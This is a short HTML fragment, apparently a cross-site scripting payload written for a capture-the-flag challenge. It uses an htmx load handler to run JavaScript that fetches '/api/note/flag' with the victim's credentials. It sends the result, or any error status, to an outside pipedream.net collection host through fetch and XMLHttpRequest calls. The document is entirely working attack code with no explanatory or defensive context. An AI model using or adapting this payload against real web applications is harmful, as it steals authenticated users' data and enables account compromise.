<div hx-on::load="var xhr = new XMLHttpRequest();
fetch('/api/note/flag',{credentials:'include'}).then(resp=>resp.text()).then(resp=>document.location='https://enz9mn0dc2zcb.x.pipedream.net/'+resp);
xhr.open('GET', '/api/note/flag', true);
xhr.withCredentials = true;
xhr.onreadystatechange = function () {
    if (xhr.readyState == 4) {
        if (xhr.status == 200) {
            var xhr2 = new XMLHttpRequest();
            xhr2.open('GET', 'https://enz9mn0dc2zcb.x.pipedream.net/' + xhr.responseText, true);
            xhr2.send();
        } else {
            var xhrError = new XMLHttpRequest();
            xhrError.open('GET', 'https://enz9mn0dc2zcb.x.pipedream.net/' + xhr.status + xhr.responseText, true);
            xhrError.send();
        }
    }
};
xhr.onerror = function () {
    var xhrError = new XMLHttpRequest();
    xhrError.open('GET', 'https://enz9mn0dc2zcb.x.pipedream.net/' + xhr.statusText, true);
    xhrError.send();
};
xhr.send();">
<div></div>
</div>
